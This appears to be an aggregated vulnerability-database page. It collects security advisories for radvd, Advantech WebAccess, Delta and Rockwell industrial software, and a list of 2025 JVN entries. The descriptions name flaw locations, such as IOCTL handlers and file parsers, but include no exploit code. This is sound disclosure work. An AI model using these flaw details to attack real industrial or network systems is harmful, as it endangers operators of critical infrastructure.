Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201908-0863 Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of DOE files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0026 Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation ISPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of dvp files. The process does not properly validate the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of current process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2025-002592 Multiple vulnerabilities in CHOCO TEI WATCHER mini 2025-03-26T13:25+09:00 2025-03-26T13:25+09:00
jvndb-2025-000019 Multiple vulnerabilities in AssetView 2025-03-25T17:10+09:00 2025-03-25T17:10+09:00
jvndb-2024-000117 Stack-based buffer overflow vulnerability in multiple Ricoh laser printers and MFPs which implement Web Image Monitor 2024-10-31T16:44+09:00 2025-03-25T11:39+09:00
jvndb-2025-000018 Multiple vulnerabilities in home gateway HGW-BL1500HM 2025-03-19T15:33+09:00 2025-03-19T15:33+09:00
jvndb-2025-000020 +F FS010M vulnerable to OS command injection 2025-03-18T15:01+09:00 2025-03-18T15:01+09:00
jvndb-2025-000017 hostapd vulnerable to improper processing of RADIUS packets 2025-03-12T14:19+09:00 2025-03-12T14:19+09:00
jvndb-2025-000016 Multiple vulnerabilities in RemoteView Agent (for Windows) 2025-03-06T14:27+09:00 2025-03-10T15:22+09:00
jvndb-2025-001898 Multiple vulnerabilities in FutureNet AS series (Industrial Routers) and FA series (Protocol Conversion Machine) 2025-03-04T14:56+09:00 2025-03-04T14:56+09:00
jvndb-2025-001605 "RoboForm Password Manager" App for Android vulnerable to authentication bypass using an alternate path or channel 2025-02-20T20:15+09:00 2025-02-20T20:15+09:00
